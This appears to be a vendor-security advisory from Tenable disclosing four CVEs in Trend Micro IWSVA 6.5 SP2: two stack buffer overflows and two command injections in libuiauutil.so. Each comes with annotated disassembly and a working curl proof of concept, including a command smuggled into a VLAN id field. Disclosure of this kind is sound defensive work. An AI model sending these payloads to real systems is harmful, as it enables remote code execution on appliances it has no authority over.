Tenable found multiple vulnerabilities in Trend Micro InterScan Web Security Virtual Appliance (IWSVA) 6.5 Service Pack 2, build 1901.
CVE-2020-28578: Unauthenticated Remote Stack Buffer Overflow
The flaw exists in the Java_com_trend_iwss_gui_IWSSJNI_DecryptPasswd function in libuiauutil.so due to improper validation of user-supplied data before copying it to a fixed-size, stack-based buffer via the strcpy function:
.text:0001EC00 Java_com_trend_iwss_gui_IWSSJNI_DecryptPasswd proc near
.text:0001EC00 ; DATA XREF: LOAD:00003770↑o
.text:0001EC00
.text:0001EC00 dest= dword ptr -42Ch
.text:0001EC00 src= dword ptr -428h
.text:0001EC00 var_424= dword ptr -424h
.text:0001EC00 var_41C= byte ptr -41Ch
.text:0001EC00 var_10= dword ptr -10h
.text:0001EC00 var_C= dword ptr -0Ch
.text:0001EC00 var_8= dword ptr -8
.text:0001EC00 var_4= dword ptr -4
.text:0001EC00 arg_jniEnv= dword ptr 4
.text:0001EC00 arg_jstringPassword= dword ptr 0Ch
.text:0001EC00
.text:0001EC00 ; __unwind {
.text:0001EC00 sub esp, 42Ch
.text:0001EC06 mov [esp+42Ch+var_C], esi
.text:0001EC0D mov esi, [esp+42Ch+arg_jniEnv]
.text:0001EC14 mov edx, [esp+42Ch+arg_jstringPassword] ; attacker-controlled
.text:0001EC1B mov [esp+42Ch+var_10], ebx
.text:0001EC22 mov [esp+42Ch+var_8], edi
.text:0001EC29 lea edi, [esp+42Ch+var_41C]
.text:0001EC2D mov [esp+42Ch+var_4], ebp
.text:0001EC34 mov eax, [esi]
.text:0001EC36 call sub_1978D
.text:0001EC3B add ebx, 60FA9h
.text:0001EC41 mov [esp+42Ch+src], edx
.text:0001EC45 mov [esp+42Ch+var_424], 0
.text:0001EC4D mov [esp+42Ch+dest], esi
.text:0001EC50 convert jstring to *char
.text:0001EC50 call [eax+JNIEnv.GetStringUTFChars]
.text:0001EC56 mov [esp+42Ch+dest], edi ; fixed-size stack buf -> stack overflow !
.text:0001EC59 mov [esp+42Ch+src], eax ; attacker-controlled
.text:0001EC5D mov ebp, eax
.text:0001EC5F call _strcpy
...
Proof of Concept
An unauthenticated, remote attacker can exploit the vulnerability by sending a specially crafted HTTP message to URL /rest/windows_client_status on HTTPS port 8443:
curl -ski -d 'ip=localhost&basic=true&encry=false&password='$(python -c "print 'A'*0x1000") https://:8443/rest/windows_client_status
The attacker can potentially achieve remote code execution with the privileges of the iscan account.
CVE-2020-28579: Authenticated Remote Stack Buffer Overflow
The flaw exists in the MailNotification function in libuiauutil.so due to improper validation of user-supplied data before copying it to a fixed-size, stack-based buffer via the strcat function:
.text:00048950 MailNotification(char const*, char const*, char const*, char const*, char *) proc near
.text:00048950 ; CODE XREF: MailNotification(char const*,char const*,char const*,char const*,char *)↑j
.text:00048950 ; DATA XREF: LOAD:00005C10↑o
.text:00048950 ; .got.plt:off_803F8↓o
.text:00048950
.text:00048950 buf= dword ptr -564Ch
.text:00048950 c = dword ptr -5648h
.text:00048950 n = dword ptr -5644h
.text:00048950 var_5634= dword ptr -5634h
.text:00048950 var_5630= dword ptr -5630h
.text:00048950 var_562C= byte ptr -562Ch
.text:00048950 var_542C= byte ptr -542Ch
.text:00048950 var_502C= byte ptr -502Ch
.text:00048950 dest= byte ptr -3C2Ch
.text:00048950 var_282C= dword ptr -282Ch
.text:00048950 var_2828= byte ptr -2828h
.text:00048950 var_1428= dword ptr -1428h
.text:00048950 var_1424= byte ptr -1424h
.text:00048950 arg_mail_queue_path= dword ptr 4
.text:00048950 arg_sender_addr= dword ptr 8
.text:00048950 arg_trendlab_addr= dword ptr 0Ch
.text:00048950 arg_mailsubject= dword ptr 10h
.text:00048950 arg_bodymsg= dword ptr 14h
.text:00048950
.text:00048950 ; __unwind {
.text:00048950 push ebp
.text:00048951 push edi
.text:00048952 push esi
.text:00048953 push ebx
.text:00048954 call sub_1978D
.text:00048959 add ebx, 3728Bh
.text:0004895F sub esp, 563Ch
.text:00048965 lea eax, [esp+564Ch+dest]
.text:0004896C mov [esp+564Ch+n], 3C10h ; n
.text:00048974 lea ebp, [esp+564Ch+var_542C]
.text:0004897B mov [esp+564Ch+c], 0 ; c
.text:00048983 mov [esp+564Ch+buf], eax ; s
.text:00048986 call _memset
.text:0004898B mov eax, [esp+564Ch+arg_sender_addr]
.text:00048992 mov [esp+564Ch+c], eax ; attacker-controlled src data
.text:00048996 lea eax, [esp+564Ch+dest]
.text:0004899D mov [esp+564Ch+buf], eax ; fixed_size stack buf -> stack overflow!
.text:000489A0 call _strcat
...
Proof of Concept
An authenticated, remote attacker can exploit the vulnerability by sending a specially crafted HTTP message to URL /urlf_reclassifyurl.jsp on HTTPS port 8443:
a) Login with a low privileged, reports only user account
curl -ski -d 'wherefrom=&wronglogon=no&uid=reports_only_user&passwd=&pwd=Log+On' https://:8443/uilogonsubmit.jsp
HTTP/1.1 302 Found
Cache-Control: no-cache
Content-Length: 0
Content-Type: text/html;charset=UTF-8
Date: Fri, 24 Jul 2020 20:14:44 GMT
Location: https://:8443/index.jsp?CSRFGuardToken=55MYNQKMBK8KC3EB9TXC3FKOQH372OGX&summary_scan
Pragma: no-cache
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=B3C8680FE9EEE804422FD8813D58496A; Path=/; Secure; HttpOnly
b) Attack with valid credentials and CSRFGuardToken
curl -ski --cookie 'JSESSIONID=B3C8680FE9EEE804422FD8813D58496A' -d 'op=send&url=MyUrl&sender_note=MySendNote&mailsubject=MyMailSubject&sender_addr='$(python -c "print 'A'*0x10000") https://:8443/urlf_reclassifyurl.jsp?CSRFGuardToken=55MYNQKMBK8KC3EB9TXC3FKOQH372OGX
The attacker can potentially achieve remote code execution with the privileges of the iscan account.
CVE-2020-28580: Authenticated Command Injection in AddVLANItem
The flaw exists in the Java_com_trend_iwss_gui_IWSSJNI_AddVLANItem function in libuiauutil.so due to improper validation of user-supplied data before passing it to a system shell:
.text:00020620 lea eax, (aUsrIwssAdminui - 7FBE4h)[ebx] ; "/usr/iwss/AdminUI/ui_ctl.sh"
.text:00020626 mov [esp+24Ch+param4], eax
.text:0002062A lea eax, (aSAddvlanitemS - 7FBE4h)[ebx] ; "%s addVLANItem %s"
.text:00020630 mov [esp+24Ch+param1], edx
.text:00020633 mov [esp+24Ch+param5], ebp ; attacker-controlled string
.text:00020637 mov [esp+24Ch+param3], eax ; format
.text:0002063B mov [esp+24Ch+param2], 1FFh ; maxlen
.text:00020643 mov [esp+24Ch+var_220], edx
.text:00020647 call _snprintf
.text:0002064C mov edx, [esp+24Ch+var_220]
.text:00020650 mov [esp+24Ch+param1], edx ; char *
.text:00020653 call system_with_fd_closed(char const*)
...
Proof of Concept
An authenticated, remote attacker can exploit the vulnerability by sending a specially crafted HTTP message to URL /servlet/com.trend.iwss.gui.servlet.ManageVLANSettings on HTTPS port 8443:
a) Login with a high privileged account
curl -ski -d 'wherefrom=&wronglogon=no&uid=admin&passwd=&pwd=Log+On' https://:8443/uilogonsubmit.jsp
HTTP/1.1 302 Found
Cache-Control: no-cache
Content-Length: 0
Content-Type: text/html;charset=UTF-8
Date: Sat, 25 Jul 2020 01:32:57 GMT
Location: https://:8443/index.jsp?CSRFGuardToken=J4GIIPQZUU8896UP9P566UHSU54O30UX&summary_scan
Pragma: no-cache
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=E96E748E079915805B771A2F1E38D63E; Path=/; Secure; HttpOnly
b) Attack with valid credentials and CSRFGuardToken
curl -ski --cookie 'JSESSIONID=E96E748E079915805B771A2F1E38D63E' -d 'CSRFGuardToken=J4GIIPQZUU8896UP9P566UHSU54O30UX&action=add&ip=MyIp&submask=MySubMask&port=MyPort&id=MyId;touch /tmp/cmd_injection' https://:8443/servlet/com.trend.iwss.gui.servlet.ManageVLANSettings
The attacker can execute arbitrary OS commands with the privileges of the iscan account.
CVE-2020-28581: Authenticated Command Injection in ModifyVLANItem
The flaw exists in the Java_com_trend_iwss_gui_IWSSJNI_ModifyVLANItem function in libuiauutil.so due to improper validation of user-supplied data before passing it to a system shell:
.text:0002088D mov eax, [esp+24Ch+var_220]
.text:00020891 lea ecx, [esp+24Ch+s]
.text:00020895 mov [esp+24Ch+param5], edx ; attacker-controlled string
.text:00020899 mov [esp+24Ch+param1], ecx
.text:0002089C mov [esp+24Ch+param2], 1FFh ; maxlen
.text:000208A4 mov [esp+24Ch+param6], eax
.text:000208A8 lea eax, (aUsrIwssAdminui - 7FBE4h)[ebx] ; "/usr/iwss/AdminUI/ui_ctl.sh"
.text:000208AE mov [esp+24Ch+param4], eax
.text:000208B2 lea eax, (aSSetvlanitemin - 7FBE4h)[ebx] ; "%s setVLANItemIndex %s %d"
.text:000208B8 mov [esp+24Ch+param3], eax ; format
.text:000208BC mov [esp+24Ch+new], edx
.text:000208C0 call _snprintf
.text:000208C5 lea eax, [esp+24Ch+s]
.text:000208C9 mov [esp+24Ch+param1], eax ; char *
.text:000208CC call system_with_fd_closed(char const*)
...
Proof of Concept
An authenticated, remote attacker can exploit the vulnerability by sending a specially crafted HTTP message to URL /servlet/com.trend.iwss.gui.servlet.ManageVLANSettings on HTTPS port 8443:
a) Login with a high privileged account
curl -ski -d 'wherefrom=&wronglogon=no&uid=admin&passwd=&pwd=Log+On' https://:8443/uilogonsubmit.jsp
HTTP/1.1 302 Found
Cache-Control: no-cache
Content-Length: 0
Content-Type: text/html;charset=UTF-8
Date: Sat, 25 Jul 2020 03:37:45 GMT
Location: https://:8443/index.jsp?CSRFGuardToken=K26DCQZV520QQRB7PXU1ZLEL9RB1KRT8&summary_scan
Pragma: no-cache
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=2867F790DE0F3B0445967CDEF6D9F609; Path=/; Secure; HttpOnly
b) Attack with valid credentials and CSRFGuardToken
curl -ski --cookie 'JSESSIONID=2867F790DE0F3B0445967CDEF6D9F609' -d 'CSRFGuardToken=K26DCQZV520QQRB7PXU1ZLEL9RB1KRT8&action=modify&oldip=MyOldIp&oldsubmask=MyOldSubMask&oldport=MyOldPort&oldid=MyOldId&ip=MyIp&submask=MySubMask&port=MyPort&id=MyId;touch /tmp/cmd_injection' https://:8443/servlet/com.trend.iwss.gui.servlet.ManageVLANSettings
The attacker can execute arbitrary OS commands with the privileges of the iscan account.